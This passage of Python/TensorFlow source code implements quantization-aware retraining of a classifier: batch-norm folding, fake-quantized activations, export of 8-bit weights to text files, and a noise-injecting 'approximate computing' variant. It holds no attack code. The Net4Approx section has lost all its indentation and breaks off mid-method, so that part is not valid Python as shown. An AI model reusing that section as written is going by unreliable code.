                # Run layer update ops (e.g. moving statistics) after the step.
                self._sess.run(self._updateOps)
                print('\rStep: ', step, '; Loss: %.3f'% loss, '; Accuracy: %.3f'% accu, end='')
                if step % self._HParam['ValidateAfter'] == 0:
                    print('\n')
                    accu = self.evaluate(genTest)
                    if pathSave is not None and accu >= maxAccu:
                        maxAccu = accu
                        self.save(pathSave)
                    self._postTrain()
                    # evaluate() switched to test phase; switch back.
                    self._sess.run([self._phaseTrain])

    def _postTrain(self, path='./QuantWeights'):
        """Hook called after evaluation checkpoints; subclasses override to export weights."""
        pass

    def evaluate(self, genTest, path=None):
        """Average loss/accuracy over HParam['TestSteps'] batches; returns the mean accuracy."""
        if path is not None:
            self.load(path)
        totalLoss = 0.0
        totalAccu = 0.0
        self._sess.run([self._phaseTest])
        for idx in range(self._HParam['TestSteps']):
            data, label = next(genTest)
            loss, accu = self._sess.run([self._loss, self._accuracy], \
                                        feed_dict={self._images: data, \
                                                   self._labels: label})
            totalLoss += loss
            totalAccu += accu
            print('\rTest Step: ', idx, '; Loss: %.3f'% loss, '; Accuracy: %.3f'% accu, end='')
        totalLoss /= self._HParam['TestSteps']
        totalAccu /= self._HParam['TestSteps']
        print('\nTest: Loss: ', totalLoss, '; Accuracy: ', totalAccu, '\n')
        return totalAccu

    def body(self, images):
        """Build the backbone via the user-supplied body fn and append the logits layer."""
        # Body
        net, layers = self._body(self, images)
        logits = Layer.FullyConnected(net, outputSize=self._numClasses, \
                                      weightInit=Layer.XavierInit, wd=self._HParam['WeightDecay'], \
                                      biasInit=Layer.ConstInit(0.0), \
                                      activation=Layer.Linear, \
                                      # bn=True, step=self._step, ifTest=self._ifTest, epsilon=1e-8, \
                                      name='FC_Logits', dtype=tf.float32)
        layers.append(logits)
        return logits.output, layers

    def inference(self, logits):
        """Predicted class = argmax over the last axis of the logits."""
        return tf.argmax(logits, axis=-1, name='inference')

    def lossFunc(self, logits, labels, name='cross_entropy'):
        """Cross-entropy data loss between logits and integer labels."""
        net = Layer.CrossEntropy(logits, labels, name=name)
        return net.output

    def save(self, path):
        """Save a checkpoint at `path`, suffixed with the global step."""
        self._saver.save(self._sess, path, global_step=self._step)
        # print(self._sess.graph_def)
        # constantGraph = graph_util.convert_variables_to_constants(self._sess, self._sess.graph_def, ['Net4Classify_1/GPU_0/FC_Logits/FinalOutput'])
        # with tf.gfile.FastGFile("/".join(path.split("/")[:-1]) + "/saved_model.pb", "wb") as fout:
        #     fout.write(constantGraph.SerializeToString())

    def load(self, path):
        """Restore variables from the checkpoint at `path`."""
        self._saver.restore(self._sess, path)
class Net4Quant(Net4Classify):
    """Quantization-aware rebuild of a pretrained Net4Classify.

    Before constructing its own graph it harvests weights, biases,
    batch-norm statistics, and activation ranges from `pretrained`
    (folding BN into the weights/bias), then rebuilds the network with
    fake-quantized activations.  After training, _postTrain exports
    8-bit quantized weights/biases/activation ranges to text files.
    """

    def __init__(self, inputShape, numClasses, body, pretrained, HParam=HParamDefault, name='Net4Quant'):
        # Harvest from the pretrained net BEFORE building our own graph,
        # since body() needs self._preWeights / self._preBias.
        self._pretrained = pretrained
        self._preInit()
        Net4Classify.__init__(self, inputShape, numClasses, body, HParam, name)

    def _preInit(self):
        """Catalogue the pretrained net's layers and copy BN-folded weights/biases.

        Populates bookkeeping dicts on self._pretrained, then fills
        self._preWeights / self._preBias (keyed by layer name) with
        NumPy values evaluated from the pretrained session.
        """
        # tf.contrib.quantize.create_training_graph(input_graph=self._pretrained._graph, quant_delay=0)
        self._pretrained._quantLayers = {}
        self._pretrained._haveWeights = {}
        self._pretrained._haveBN = {}
        self._pretrained._layerInfos = []
        self._pretrained._layerNames = []
        self._pretrained._layerTypes = []
        for idx in range(len(self._pretrained._layers)):
            print('Analyzing layer: ', self._pretrained._layers[idx]._name)
            name = self._pretrained._layers[idx]._name
            layertype = self._pretrained._layers[idx]._type
            self._pretrained._layerNames.append(name)
            self._pretrained._quantLayers[name] = {}
            # Collect each layer's variables by role; _haveWeights/_haveBN
            # flag which layers carry trainable weights / BN statistics.
            for varName in self._pretrained._layers[idx]._variables.keys():
                if varName == 'Weights':
                    self._pretrained._haveWeights[name] = True
                    weights = self._pretrained._layers[idx]._variables[varName]
                    self._pretrained._quantLayers[name]['Weights'] = weights
                    print(self._pretrained._layers[idx]._variables[varName])
                elif varName == 'Bias':
                    self._pretrained._haveWeights[name] = True
                    bias = self._pretrained._layers[idx]._variables[varName]
                    self._pretrained._quantLayers[name]['Bias'] = bias
                    print(self._pretrained._layers[idx]._variables[varName])
                elif varName == 'BN_Offset':
                    self._pretrained._haveBN[name] = True
                    offset = self._pretrained._layers[idx]._variables[varName]
                    self._pretrained._quantLayers[name]['BN_Offset'] = offset
                    print(self._pretrained._layers[idx]._variables[varName])
                elif varName == 'BN_Scale':
                    self._pretrained._haveBN[name] = True
                    scale = self._pretrained._layers[idx]._variables[varName]
                    self._pretrained._quantLayers[name]['BN_Scale'] = scale
                    print(self._pretrained._layers[idx]._variables[varName])
                elif varName == 'BN_MovMean':
                    self._pretrained._haveBN[name] = True
                    movmean = self._pretrained._layers[idx]._variables[varName]
                    self._pretrained._quantLayers[name]['BN_MovMean'] = movmean
                    print(self._pretrained._layers[idx]._variables[varName])
                elif varName == 'BN_MovVar':
                    self._pretrained._haveBN[name] = True
                    movvar = self._pretrained._layers[idx]._variables[varName]
                    self._pretrained._quantLayers[name]['BN_MovVar'] = movvar
                    print(self._pretrained._layers[idx]._variables[varName])
            # Recorded activation range of the layer's output.
            act_min = self._pretrained._layers[idx].outMin
            self._pretrained._quantLayers[name]['Act_Min'] = act_min
            print(act_min)
            act_max = self._pretrained._layers[idx].outMax
            self._pretrained._quantLayers[name]['Act_Max'] = act_max
            print(act_max)
            # Geometry info per layer type, later written to the config file:
            # Conv -> [conv stride (+ pooling size/stride if fused)], Pooling -> [size, stride].
            if layertype.find('Conv') >= 0:
                info = [self._pretrained._layers[idx]._strideConv[1]]
                if self._pretrained._layers[idx]._pool:
                    layertype += 'Pooling'
                    info.extend([self._pretrained._layers[idx]._sizePooling[1], self._pretrained._layers[idx]._stridePooling[1]])
                self._pretrained._layerInfos.append(info)
            elif layertype.find('Pooling') >= 0:
                info = [self._pretrained._layers[idx]._sizePooling[1], self._pretrained._layers[idx]._stridePooling[1]]
                self._pretrained._layerInfos.append(info)
            else:
                info = []
                self._pretrained._layerInfos.append(info)
            self._pretrained._layerTypes.append(layertype)
            # print(self._pretrained._layers[idx]._variables)
        # Debug dump of everything catalogued above.
        list(map(lambda l: print(l) or list(map(lambda x: print("\t", x, ":", self._pretrained._quantLayers[l][x]), self._pretrained._quantLayers[l].keys())), self._pretrained._layerNames))
        self._preWeights = {}
        self._preBias = {}
        for idx in range(len(self._pretrained._layerNames)):
            name = self._pretrained._layerNames[idx]
            layertype = self._pretrained._layerTypes[idx]
            print("Copying Layer:", name)
            if name in self._pretrained._haveWeights:
                weights = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Weights'])
                bias = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Bias']) if 'Bias' in self._pretrained._quantLayers[name] else 0.0
                act_min = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Act_Min'])
                act_max = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Act_Max'])
                if name in self._pretrained._haveBN:
                    # Fold batch norm into the weights and bias:
                    # w' = w * scale/stddev ; b' = offset + (b - mean) * scale/stddev.
                    offset = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_Offset']) if 'BN_Offset' in self._pretrained._quantLayers[name] else 0.0
                    scale = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_Scale']) if 'BN_Scale' in self._pretrained._quantLayers[name] else 1.0
                    movmean = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_MovMean'])
                    movvar = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_MovVar'])
                    stddev = np.sqrt(movvar + 1e-8)
                    tmp = scale / stddev
                    weights = weights * tmp
                    bias = offset + tmp * (bias - movmean)
                self._preWeights[name] = weights
                self._preBias[name] = bias

    def body(self, images):
        """Rebuild the backbone from copied weights with fake-quantized activations."""
        def _outWrapper(net):
            # Simulate quantization
            a = net._outMin
            b = net._outMax
            s = (b - a) / 255.0
            output = net.output
            # NOTE(review): `s` and the first `output` binding are unused;
            # the fake-quant result below is what is returned.
            output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
            # Simulate value degrade in approximate computing
            # output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
            return output
        # Body
        # The body fn receives the copied (BN-folded) weights/biases so each
        # layer can be initialised to the pretrained values.
        net, layers = self._body(self, images, self._preWeights, self._preBias)
        logits = Layer.FullyConnected(_outWrapper(net), outputSize=self._numClasses, \
                                      weightInit=Layer.ConstInit(self._preWeights['FC_Logits']), wd=self._HParam['WeightDecay'], \
                                      biasInit=Layer.ConstInit(self._preBias['FC_Logits']), \
                                      activation=Layer.Linear, \
                                      fakeQuant=True, name='FC_Logits', dtype=tf.float32)
        layers.append(logits)
        return logits.output, layers

    def _postInit(self):
        """Catalogue this (rebuilt) net's own layers, mirroring _preInit's bookkeeping."""
        # tf.contrib.quantize.create_training_graph(input_graph=self._graph, quant_delay=0)
        self._quantLayers = {}
        self._haveWeights = {}
        self._haveBN = {}
        self._layersTable = {}
        self._layerInfos = []
        self._layerNames = []
        self._layerTypes = []
        for idx in range(len(self._layers)):
            print('Analyzing layer: ', self._layers[idx]._name)
            name = self._layers[idx]._name
            self._layersTable[name] = self._layers[idx]
            layertype = self._layers[idx]._type
            self._layerNames.append(name)
            self._quantLayers[name] = {}
            for varName in self._layers[idx]._variables.keys():
                if varName == 'Weights':
                    self._haveWeights[name] = True
                    weights = self._layers[idx]._variables[varName]
                    self._quantLayers[name]['Weights'] = weights
                    print(self._layers[idx]._variables[varName])
                elif varName == 'Bias':
                    self._haveWeights[name] = True
                    bias = self._layers[idx]._variables[varName]
                    self._quantLayers[name]['Bias'] = bias
                    print(self._layers[idx]._variables[varName])
                elif varName == 'BN_Offset':
                    self._haveBN[name] = True
                    offset = self._layers[idx]._variables[varName]
                    self._quantLayers[name]['BN_Offset'] = offset
                    print(self._layers[idx]._variables[varName])
                elif varName == 'BN_Scale':
                    self._haveBN[name] = True
                    scale = self._layers[idx]._variables[varName]
                    self._quantLayers[name]['BN_Scale'] = scale
                    print(self._layers[idx]._variables[varName])
                elif varName == 'BN_MovMean':
                    self._haveBN[name] = True
                    movmean = self._layers[idx]._variables[varName]
                    self._quantLayers[name]['BN_MovMean'] = movmean
                    print(self._layers[idx]._variables[varName])
                elif varName == 'BN_MovVar':
                    self._haveBN[name] = True
                    movvar = self._layers[idx]._variables[varName]
                    self._quantLayers[name]['BN_MovVar'] = movvar
                    print(self._layers[idx]._variables[varName])
            act_min = self._layers[idx].outMin
            self._quantLayers[name]['Act_Min'] = act_min
            print(act_min)
            act_max = self._layers[idx].outMax
            self._quantLayers[name]['Act_Max'] = act_max
            print(act_max)
            if layertype.find('Conv') >= 0:
                info = [self._layers[idx]._strideConv[1]]
                if self._layers[idx]._pool:
                    layertype += 'Pooling'
                    info.extend([self._layers[idx]._sizePooling[1], self._layers[idx]._stridePooling[1]])
                self._layerInfos.append(info)
            elif layertype.find('Pooling') >= 0:
                info = [self._layers[idx]._sizePooling[1], self._layers[idx]._stridePooling[1]]
                self._layerInfos.append(info)
            else:
                info = []
                self._layerInfos.append(info)
            self._layerTypes.append(layertype)
            # print(self._layers[idx]._variables)
        list(map(lambda l: print(l) or list(map(lambda x: print("\t", x, ":", self._quantLayers[l][x]), self._quantLayers[l].keys())), self._layerNames))

    def _postTrain(self, path='./QuantWeights'):
        """Export 8-bit quantized weights, biases, and activation ranges.

        Writes, under `path` (directory must already exist): a layer-name
        list, a per-layer geometry config, and per-layer weights/biases/
        activations text files (scale, zero-point, then values); also
        dumps dequantized values to ./Debug.txt.
        """
        def quantWeights(weights, layerName):
            # Symmetric 8-bit quantization: scale = 2*max|w|/255, zero point 128.
            #print('Max: ', weights.max(), '; Min: ', weights.min())
            #S_weights = (weights.max() - weights.min()) / 255
            #Z_weights = int(np.round((0.0 - weights.min()) / S_weights))
            #Q_weights = np.round((weights - weights.min()) / S_weights).astype(np.int)
            maxabs = np.abs(weights).max()
            # maxabs = self._layersTable[layerName]._weightMax.eval(session=self._sess)
            print('Max: ', weights.max(), '; Min: ', weights.min(), '; Abs: ', maxabs)
            S_weights = 2 * maxabs / 255.0
            Z_weights = 128
            # NOTE(review): np.int is deprecated in modern NumPy (use int);
            # kept as-is to match the pinned environment.
            Q_weights = np.zeros_like(weights).astype(np.int)
            Q_weights[weights == 0] = Z_weights
            Q_weights[weights > 0] = (Z_weights + np.round((weights) / S_weights).astype(np.int))[weights > 0]
            Q_weights[weights < 0] = (Z_weights + np.round((weights) / S_weights).astype(np.int))[weights < 0]
            # Q_weights = np.round((weights + maxabs) / S_weights).astype(np.int)
            # Clamp to the valid 8-bit range.
            Q_weights[Q_weights > 255] = 255
            Q_weights[Q_weights < 0] = 0
            print(" -> 0:", np.sum(Q_weights == 0), "127:", np.sum(Q_weights == 127), "128:", np.sum(Q_weights == 128), "129:", np.sum(Q_weights == 129), "255:", np.sum(Q_weights == 255))
            return S_weights, Z_weights, Q_weights
        def quantBias(biases, S_input, S_weights, layerName):
            # Bias scale is the product of input and weight scales; zero point 0.
            print('Max: ', biases.max(), '; Min: ', biases.min())
            S_biases = S_input * S_weights
            Z_biases = 0
            Q_biases = np.round(biases / S_biases).astype(np.int)
            return S_biases, Z_biases, Q_biases
        def quantAct(minAct, maxAct):
            # Asymmetric activation quantization over the recorded [min, max] range.
            print('Max: ', maxAct, '; Min: ', minAct)
            S_acts = (maxAct - minAct) / 255
            Z_acts = int(np.round((0.0 - minAct) / S_acts))
            return S_acts, Z_acts
            #maxabs = max(abs(maxAct), abs(minAct))
            #print('Max: ', maxAct, '; Min: ', minAct, '; MaxAbs: ', maxabs)
            #S_acts = 2 * maxabs / 255.0
            #Z_acts = 128
            #return S_acts, Z_acts
        self._postWeights = {}
        self._postBias = {}
        self._postActivationsMax = {}
        self._postActivationsMin = {}
        # Network input is assumed to be scaled to [0, 1] from 8-bit pixels.
        S_input = 1.0 / 255.0
        Z_input = 0
        # S_last chains each layer's input scale to the previous layer's
        # activation scale.
        S_last = S_input
        f_names = open(path + '/' + self._name+'_names.txt', 'w')
        f_config = open(path + '/' + self._name+'_config.txt', 'w')
        f_debug = open('./Debug.txt', 'w')
        for idx in range(len(self._layerNames)):
            name = self._layerNames[idx]
            layertype = self._layerTypes[idx]
            f_names.write(name + " " + layertype + "\n")
            print("Quantizing Layer:", name)
            if name in self._haveWeights:
                weights = self._sess.run(self._quantLayers[name]['Weights'])
                bias = self._sess.run(self._quantLayers[name]['Bias'])
                act_min = self._sess.run(self._quantLayers[name]['Act_Min'])
                act_max = self._sess.run(self._quantLayers[name]['Act_Max'])
                if name in self._haveBN:
                    # Fold batch norm exactly as in _preInit.
                    offset = self._sess.run(self._quantLayers[name]['BN_Offset'])
                    scale = self._sess.run(self._quantLayers[name]['BN_Scale'])
                    movmean = self._sess.run(self._quantLayers[name]['BN_MovMean'])
                    movvar = self._sess.run(self._quantLayers[name]['BN_MovVar'])
                    assert len(offset.shape) == 1, 'WRONG: offset'
                    assert len(scale.shape) == 1, 'WRONG: scale'
                    assert len(movmean.shape) == 1, 'WRONG: movmean'
                    assert len(movvar.shape) == 1, 'WRONG: movvar'
                    stddev = np.sqrt(movvar + 1e-8)
                    tmp = scale / stddev
                    weights = weights * tmp
                    bias = offset + tmp * (bias - movmean)
                shape_weights = weights.shape
                shape_bias = bias.shape
                for jdx in range(len(shape_weights)):
                    f_config.write(str(shape_weights[jdx]) + " ")
                for info in self._layerInfos[idx]:
                    f_config.write(str(info) + " ")
                f_config.write("\n")
                weights = weights.reshape([-1])
                bias = bias.reshape([-1])
                S_weights, Z_weights, Q_weights = quantWeights(weights, name)
                S_biases, Z_biases, Q_biases = quantBias(bias, S_last, S_weights, name)
                S_acts, Z_acts = quantAct(act_min, act_max)
                S_last = S_acts
                # Keep the dequantized values for inspection/debugging.
                self._postWeights[name] = S_weights * (Q_weights - Z_weights)
                self._postBias[name] = S_biases * (Q_biases - Z_biases)
                self._postActivationsMin[name] = act_min
                self._postActivationsMax[name] = act_max
                print(name, ' weights: ', file = f_debug)
                print(self._postWeights[name], file = f_debug)
                print(name, ' bias: ', file = f_debug)
                print(self._postBias[name], file = f_debug)
                # NOTE(review): the inner `for idx` loops below shadow the
                # outer layer index; harmless today because idx is not read
                # again in this branch, but fragile.
                with open(path + '/' + name + '_weights.txt', 'w') as fout:
                    fout.write(str(S_weights) + "\n")
                    fout.write(str(Z_weights) + "\n")
                    for idx in range(Q_weights.shape[0]):
                        fout.write(str(Q_weights[idx]) + " ")
                with open(path + '/' + name + '_biases.txt', 'w') as fout:
                    fout.write(str(S_biases) + "\n")
                    fout.write(str(Z_biases) + "\n")
                    for idx in range(Q_biases.shape[0]):
                        fout.write(str(Q_biases[idx]) + " ")
                with open(path + '/' + name + '_activations.txt', 'w') as fout:
                    fout.write(str(S_acts) + "\n")
                    fout.write(str(Z_acts) + "\n")
            else:
                # Weight-less layer (e.g. pooling): only export activation range.
                act_min = self._sess.run(self._quantLayers[name]['Act_Min'])
                act_max = self._sess.run(self._quantLayers[name]['Act_Max'])
                S_acts, Z_acts = quantAct(act_min, act_max)
                S_last = S_acts
                self._postActivationsMin[name] = act_min
                self._postActivationsMax[name] = act_max
                if layertype.find('Pooling') >= 0:
                    f_config.write(str(self._layerInfos[idx][0]) + " " + str(self._layerInfos[idx][1]))
                    f_config.write("\n")
                with open(path + '/' + name + '_activations.txt', 'w') as fout:
                    fout.write(str(S_acts) + "\n")
                    fout.write(str(Z_acts) + "\n")
        f_names.close()
        f_config.close()
        f_debug.close()
class Net4Approx(Net4Classify):
def __init__(self, inputShape, numClasses, body, pretrained, HParam=HParamDefault, name='Net4Approx'):
self._pretrained = pretrained
self._preInit()
Net4Classify.__init__(self, inputShape, numClasses, body, HParam, name)
def _preInit(self):
# tf.contrib.quantize.create_training_graph(input_graph=self._pretrained._graph, quant_delay=0)
self._pretrained._quantLayers = {}
self._pretrained._haveWeights = {}
self._pretrained._haveBN = {}
self._pretrained._layerInfos = []
self._pretrained._layerNames = []
self._pretrained._layerTypes = []
for idx in range(len(self._pretrained._layers)):
print('Analyzing layer: ', self._pretrained._layers[idx]._name)
name = self._pretrained._layers[idx]._name
layertype = self._pretrained._layers[idx]._type
self._pretrained._layerNames.append(name)
self._pretrained._quantLayers[name] = {}
for varName in self._pretrained._layers[idx]._variables.keys():
if varName == 'Weights':
self._pretrained._haveWeights[name] = True
weights = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['Weights'] = weights
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'Bias':
self._pretrained._haveWeights[name] = True
bias = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['Bias'] = bias
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_Offset':
self._pretrained._haveBN[name] = True
offset = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_Offset'] = offset
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_Scale':
self._pretrained._haveBN[name] = True
scale = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_Scale'] = scale
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_MovMean':
self._pretrained._haveBN[name] = True
movmean = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_MovMean'] = movmean
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_MovVar':
self._pretrained._haveBN[name] = True
movvar = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_MovVar'] = movvar
print(self._pretrained._layers[idx]._variables[varName])
act_min = self._pretrained._layers[idx].outMin
self._pretrained._quantLayers[name]['Act_Min'] = act_min
print(act_min)
act_max = self._pretrained._layers[idx].outMax
self._pretrained._quantLayers[name]['Act_Max'] = act_max
print(act_max)
if layertype.find('Conv') >= 0:
info = [self._pretrained._layers[idx]._strideConv[1]]
if self._pretrained._layers[idx]._pool:
layertype += 'Pooling'
info.extend([self._pretrained._layers[idx]._sizePooling[1], self._pretrained._layers[idx]._stridePooling[1]])
self._pretrained._layerInfos.append(info)
elif layertype.find('Pooling') >= 0:
info = [self._pretrained._layers[idx]._sizePooling[1], self._pretrained._layers[idx]._stridePooling[1]]
self._pretrained._layerInfos.append(info)
else:
info = []
self._pretrained._layerInfos.append(info)
self._pretrained._layerTypes.append(layertype)
# print(self._pretrained._layers[idx]._variables)
list(map(lambda l: print(l) or list(map(lambda x: print("\t", x, ":", self._pretrained._quantLayers[l][x]), self._pretrained._quantLayers[l].keys())), self._pretrained._layerNames))
self._preWeights = {}
self._preBias = {}
for idx in range(len(self._pretrained._layerNames)):
name = self._pretrained._layerNames[idx]
layertype = self._pretrained._layerTypes[idx]
print("Copying Layer:", name)
if name in self._pretrained._haveWeights:
weights = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Weights'])
bias = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Bias']) if 'Bias' in self._pretrained._quantLayers[name] else 0.0
act_min = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Act_Min'])
act_max = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Act_Max'])
if name in self._pretrained._haveBN:
offset = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_Offset']) if 'BN_Offset' in self._pretrained._quantLayers[name] else 0.0
scale = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_Scale']) if 'BN_Scale' in self._pretrained._quantLayers[name] else 1.0
movmean = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_MovMean'])
movvar = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_MovVar'])
stddev = np.sqrt(movvar + 1e-8)
tmp = scale / stddev
weights = weights * tmp
bias = offset + tmp * (bias - movmean)
self._preWeights[name] = weights
self._preBias[name] = bias
def body(self, images):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output += PORTION * (output - tf.reduce_min(output)) * tf.random_uniform(minval=FROM, maxval=TO, shape=output.shape)
output += PORTION * tf.abs(output) * tf.random_uniform(minval=FROM, maxval=TO, shape=output.shape)
return output
# Body
net, layers = self._body(self, images, self._preWeights, self._preBias)
logits = Layer.FullyConnected(_outWrapper(net), outputSize=self._numClasses, \
weightInit=Layer.ConstInit(self._preWeights['FC_Logits']), wd=self._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(self._preBias['FC_Logits']), \
activation=Layer.Linear, \
fakeQuant=True, name='FC_Logits', dtype=tf.float32)
layers.append(logits)
return logits.output, layers
def _postInit(self):
# tf.contrib.quantize.create_training_graph(input_graph=self._graph, quant_delay=0)
self._quantLayers = {}
self._layersTable = {}
self._haveWeights = {}
self._haveBN = {}
self._layerInfos = []
self._layerNames = []
self._layerTypes = []
for idx in range(len(self._layers)):
print('Analyzing layer: ', self._layers[idx]._name)
name = self._layers[idx]._name
layertype = self._layers[idx]._type
self._layersTable[name] = self._layers[idx]
self._layerNames.append(name)
self._quantLayers[name] = {}
for varName in self._layers[idx]._variables.keys():
if varName == 'Weights':
self._haveWeights[name] = True
weights = self._layers[idx]._variables[varName]
self._quantLayers[name]['Weights'] = weights
print(self._layers[idx]._variables[varName])
elif varName == 'Bias':
self._haveWeights[name] = True
bias = self._layers[idx]._variables[varName]
self._quantLayers[name]['Bias'] = bias
print(self._layers[idx]._variables[varName])
elif varName == 'BN_Offset':
self._haveBN[name] = True
offset = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_Offset'] = offset
print(self._layers[idx]._variables[varName])
elif varName == 'BN_Scale':
self._haveBN[name] = True
scale = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_Scale'] = scale
print(self._layers[idx]._variables[varName])
elif varName == 'BN_MovMean':
self._haveBN[name] = True
movmean = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_MovMean'] = movmean
print(self._layers[idx]._variables[varName])
elif varName == 'BN_MovVar':
self._haveBN[name] = True
movvar = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_MovVar'] = movvar
print(self._layers[idx]._variables[varName])
act_min = self._layers[idx].outMin
self._quantLayers[name]['Act_Min'] = act_min
print(act_min)
act_max = self._layers[idx].outMax
self._quantLayers[name]['Act_Max'] = act_max
print(act_max)
if layertype.find('Conv') >= 0:
info = [self._layers[idx]._strideConv[1]]
if self._layers[idx]._pool:
layertype += 'Pooling'
info.extend([self._layers[idx]._sizePooling[1], self._layers[idx]._stridePooling[1]])
self._layerInfos.append(info)
elif layertype.find('Pooling') >= 0:
info = [self._layers[idx]._sizePooling[1], self._layers[idx]._stridePooling[1]]
self._layerInfos.append(info)
else:
info = []
self._layerInfos.append(info)
self._layerTypes.append(layertype)
# print(self._layers[idx]._variables)
list(map(lambda l: print(l) or list(map(lambda x: print("\t", x, ":", self._quantLayers[l][x]), self._quantLayers[l].keys())), self._layerNames))
def _postTrain(self, path='./ApproxWeights'):
def quantWeights(weights, layerName):
#print('Max: ', weights.max(), '; Min: ', weights.min())
#S_weights = (weights.max() - weights.min()) / 255
#Z_weights = int(np.round((0.0 - weights.min()) / S_weights))
#Q_weights = np.round((weights - weights.min()) / S_weights).astype(np.int)
maxabs = np.abs(weights).max()
# maxabs = self._layersTable[layerName]._weightMax.eval(session=self._sess)
print('Max: ', weights.max(), '; Min: ', weights.min(), '; Abs: ', maxabs)
S_weights = 2 * maxabs / 255.0
Z_weights = 128
Q_weights = np.zeros_like(weights).astype(np.int)
Q_weights[weights == 0] = Z_weights
Q_weights[weights > 0] = (Z_weights + np.round((weights) / S_weights).astype(np.int))[weights > 0]
Q_weights[weights < 0] = (Z_weights + np.round((weights) / S_weights).astype(np.int))[weights < 0]
# Q_weights = np.round((weights + maxabs) / S_weights).astype(np.int)
Q_weights[Q_weights > 255] = 255
Q_weights[Q_weights < 0] = 0
print(" -> 0:", np.sum(Q_weights == 0), "127:", np.sum(Q_weights == 127), "128:", np.sum(Q_weights == 128), "129:", np.sum(Q_weights == 129), "255:", np.sum(Q_weights == 255))
return S_weights, Z_weights, Q_weights
def quantBias(biases, S_input, S_weights, layerName):
print('Max: ', biases.max(), '; Min: ', biases.min())
S_biases = S_input * S_weights
Z_biases = 0
Q_biases = np.round(biases / S_biases).astype(np.int)
return S_biases, Z_biases, Q_biases
def quantAct(minAct, maxAct):
print('Max: ', maxAct, '; Min: ', minAct)
S_acts = (maxAct - minAct) / 255
Z_acts = int(np.round((0.0 - minAct) / S_acts))
return S_acts, Z_acts
#maxabs = max(abs(maxAct), abs(minAct))
#print('Max: ', maxAct, '; Min: ', minAct, '; MaxAbs: ', maxabs)
#S_acts = 2 * maxabs / 255.0
#Z_acts = 128
#return S_acts, Z_acts
self._postWeights = {}
self._postBias = {}
self._postActivationsMax = {}
self._postActivationsMin = {}
S_input = 1.0 / 255.0
Z_input = 0
S_last = S_input
f_names = open('./ApproxWeights/' + self._name+'_names.txt', 'w')
f_config = open('./ApproxWeights/' + self._name+'_config.txt', 'w')
f_debug = open('./Debug.txt', 'w')
for idx in range(len(self._layerNames)):
name = self._layerNames[idx]
layertype = self._layerTypes[idx]
f_names.write(name + " " + layertype + "\n")
print("Quantizing Layer:", name)
if name in self._haveWeights:
weights = self._sess.run(self._quantLayers[name]['Weights'])
bias = self._sess.run(self._quantLayers[name]['Bias'])
act_min = self._sess.run(self._quantLayers[name]['Act_Min'])
act_max = self._sess.run(self._quantLayers[name]['Act_Max'])
if name in self._haveBN:
offset = self._sess.run(self._quantLayers[name]['BN_Offset'])
scale = self._sess.run(self._quantLayers[name]['BN_Scale'])
movmean = self._sess.run(self._quantLayers[name]['BN_MovMean'])
movvar = self._sess.run(self._quantLayers[name]['BN_MovVar'])
assert len(offset.shape) == 1, 'WRONG: offset'
assert len(scale.shape) == 1, 'WRONG: scale'
assert len(movmean.shape) == 1, 'WRONG: movmean'
assert len(movvar.shape) == 1, 'WRONG: movvar'
stddev = np.sqrt(movvar + 1e-8)
tmp = scale / stddev
weights = weights * tmp
bias = offset + tmp * (bias - movmean)
shape_weights = weights.shape
shape_bias = bias.shape
for jdx in range(len(shape_weights)):
f_config.write(str(shape_weights[jdx]) + " ")
for info in self._layerInfos[idx]:
f_config.write(str(info) + " ")
f_config.write("\n")
weights = weights.reshape([-1])
bias = bias.reshape([-1])
S_weights, Z_weights, Q_weights = quantWeights(weights, name)
S_biases, Z_biases, Q_biases = quantBias(bias, S_last, S_weights, name)
S_acts, Z_acts = quantAct(act_min, act_max)
S_last = S_acts
self._postWeights[name] = S_weights * (Q_weights - Z_weights)
self._postBias[name] = S_biases * (Q_biases - Z_biases)
self._postActivationsMin[name] = act_min
self._postActivationsMax[name] = act_max
print(name, ' weights: ', file = f_debug)
print(self._postWeights[name], file = f_debug)
print(name, ' bias: ', file = f_debug)
print(self._postBias[name], file = f_debug)
with open('./ApproxWeights/' + name + '_weights.txt', 'w') as fout:
fout.write(str(S_weights) + "\n")
fout.write(str(Z_weights) + "\n")
for idx in range(Q_weights.shape[0]):
fout.write(str(Q_weights[idx]) + " ")
with open('./ApproxWeights/' + name + '_biases.txt', 'w') as fout:
fout.write(str(S_biases) + "\n")
fout.write(str(Z_biases) + "\n")
